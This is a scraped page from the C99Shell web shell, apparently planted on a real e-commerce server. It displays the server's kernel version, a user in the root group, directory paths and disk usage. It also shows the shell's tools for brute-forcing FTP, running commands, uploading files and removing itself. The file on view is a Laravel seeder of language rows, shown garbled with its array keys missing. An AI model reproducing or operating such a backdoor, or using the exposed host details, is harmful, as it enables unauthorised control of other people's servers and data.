!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/database/seeders/   drwxr-xr-x
Free 26.08 GB of 117.98 GB (22.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LanguagesTableSeeder.php (3.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
Illuminate\Database\Seeder;

class 
LanguagesTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {


        
\DB::table('languages')->delete();

        
\DB::table('languages')->insert(array (
            
=>
            array (
                
'id' => 1,
                
'name' => 'English',
                
'short_name' => 'en',
                
'flag' => 'en.jpg',
                
'status' => 'Active',
                
'is_default' => 1,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 2,
                
'name' => 'Bengali',
                
'short_name' => 'bn',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 3,
                
'name' => 'French',
                
'short_name' => 'fr',
                
'flag' => '',
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 4,
                
'name' => 'Chinese',
                
'short_name' => 'zh',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 5,
                
'name' => 'Arabic',
                
'short_name' => 'ar',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'rtl',
            ),
            
=>
            array (
                
'id' => 6,
                
'name' => 'Byelorussian',
                
'short_name' => 'be',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 7,
                
'name' => 'Bulgarian',
                
'short_name' => 'bg',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 8,
                
'name' => 'Catalan',
                
'short_name' => 'ca',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 9,
                
'name' => 'Estonian',
                
'short_name' => 'et',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
            
=>
            array (
                
'id' => 10,
                
'name' => 'Dutch',
                
'short_name' => 'nl',
                
'flag' => NULL,
                
'status' => 'Active',
                
'is_default' => 0,
                
'direction' => 'ltr',
            ),
        ));


    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0222 ]--